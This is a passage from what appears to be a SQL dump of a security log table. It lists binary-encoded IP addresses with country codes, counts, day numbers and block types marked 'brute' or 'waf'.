','TR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���i','GB',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���','CZ',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"@�f','KR',3,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"B��','US',2,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"C��','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"C��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"DL ','US',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"DaF','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"DaF','US',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"GG_','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"P�R','TW',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"P�R','TW',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Qq','TW',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Q�W','TW',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Q��','TW',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"W�-','AU',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Z\\B','NL',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Z\\B','NL',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"\\U�','HK',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"]$d','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"^��','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"a��','JP',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"}�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"�1�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"�w�','IE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�Զ','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��	','GB',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�w�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','AU',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��F','US',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','BE',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ÇC','BE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��#œ�','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','SG',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','SG',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','SG',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��p','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�,&','BE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�,&','BE',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�,&','BE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�,&','BE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��C','IN',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ݵ�','TW',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ݵ�','TW',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�^_','US',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','FI',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�','TW',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�1�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�K�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��#엌','TW',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','US',3,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�','SG',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�[�','HK',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','DE',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��$\\[^','ID',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��%\0','NL',2,18843,'waf'),('\0\0\0\0\0\0\0\0\0\0��%\0','NL',3,18850,'waf'),('\0\0\0\0\0\0\0\0\0\0��%0w�','NL',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��%a��','NL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��%a��','NL',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��%a��','NL',2,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�\r�','NL',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�\r�','NL',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�[','FR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�[','FR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��%��r','FR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��%��r','FR',4,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�ƴ','UA',2,18855,'waf'),('\0\0\0\0\0\0\0\0\0\0��%�ƴ','UA',2,18860,'waf'),('\0\0\0\0\0\0\0\0\0\0��\'f!�','CN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��\'l\0�','CN',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��\'l\0�','CN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��(w0�','US',52,18840,'waf'),('\0\0\0\0\0\0\0\0\0\0��(z��','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��(z��','US',2,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��(z��','US',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��(z��','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��)>G','TN',28,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0��)>��','TN',11,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0��)�H�','LY',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��*��','CN',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��*��','CN',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0��*��6','CN',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��*��6','CN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�','HK',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��,�L?','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��-!{�','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��-7�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��-8�','CA',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��-8ܬ','CA',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��-8ܬ','CA',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��-=f�','CA',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��-OX','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��-OuI','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��-P�0','TR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��-]��','IR',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wS�','VN',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wS�','VN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�c','TR',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','RO',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�A*','HK',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�A*','HK',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��.','DE',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��.','DE',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��. ','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��.q','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��.q','DE',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��.&2~','RU',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e\Z','GB',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e\Zl','GB',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e�','GB',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e�','GB',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e;','GB',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��.est','DE',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��.est','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��.est','DE',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��.i','FR',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��.i','FR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��.i','FR',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��.i+-','FR',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��.ig�','FR',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�','PL',2,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�','PL',2,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��.��','BY',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��/J�','JP',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��/J�','JP',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��/`��','CN',2,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��/`��','CN',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��/aP3','CN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��/d�?','CN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��/e��','CN',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��/jɆ','CN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��/sM�','CN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��/sM�','CN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�\'','SG',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�\'','SG',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��/��','SG',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��/��','SG',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��/��','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�=�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�=�','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�=�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��/� ','CN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�','CN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�','CN',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�','CN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','DE',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','DE',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','MY',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��1\"��','IN',52,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��12D�','IN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��12F�','IN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��2]�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��2tb','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��2tb','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��3','NL',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��3','NL',2,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��3&*\'','FR',3,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��3&*\'','FR',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Dp^','FR',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Dp^','FR',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��3KR','FR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��3KR','FR',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��3KM\r','FR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��3KZ\'','FR',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��3M@�','FR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��3M�\"','FR',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��3M�\"','FR',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��3M�\"','FR',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��3O�','CA',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��3QQ\n','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��3� ','GB',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��3� ','GB',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�e2','NL',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�e2','NL',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�e2','NL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�8�','FR',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�\"o','CA',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��3ðP','FR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�.3','FR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�.3','FR',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�T�','FR',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�T�','FR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�T�','FR',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�T�','FR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�T�','FR',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��48�`','GB',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�7','NL',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�7','NL',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�7','NL',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��4���','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��4���','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�','SG',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��6&I�','FR',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��6&I�','FR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��6&I�','FR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��6��w','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��6�Y�','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��6�Y�','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��:�','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',2,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',4,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��=C�','IN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��=o�$','KR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��=o�$','KR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','PT',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','DE',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','DE',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�F�','NL',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�F�','NL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��9','DE',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��>���','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��>���','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��>���','DE',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','DE',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�q�','FR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��>Ҍ>','FR',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��>Ҵ�','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�','FR',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�d�','IR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','NL',2,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','NL',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0h','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��@[�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',2,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~Q','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~Q','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~Q','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�2�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�5?','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�:�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�I�','NL',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�R�','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',2,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��A��','DE',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��A<\n�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��A<\n�','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��A<\n�','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��A<�','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��A<�','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��A<�','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�S','US',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�S','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�|','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�i','US',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�i','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�~','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��B*:�','SG',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bs�','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bs�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bs�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��B��','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��C+�F','CA',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�2','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�*�','US',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�.','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�= ','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��C͘','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��C͘','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�o','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��DB�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�\\*','IN',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��D��U','SG',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��D��U','SG',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�#','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�#','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�\n','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��E$^�','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��x','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��E���','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��s','US',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��s','US',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��t','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��t','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��t','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��|','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��o','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��o','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��x','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��x','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��H\"\"�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��H4�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��H4�_','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�%�','US',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�%�','US',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�%�','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*-','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*-','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*-','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*-','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�.�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�.�','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�.�','US',2,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��H��s','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��H��s','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw��','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw��','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw�','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw��','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw�d','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw�\r','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw�\r','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw�\r','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��K���','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��K���','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��K���','US',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��K���','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��MD~�','GB',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��M�N','GB',4,18839,'waf'),('\0\0\0\0\0\0\0\0\0\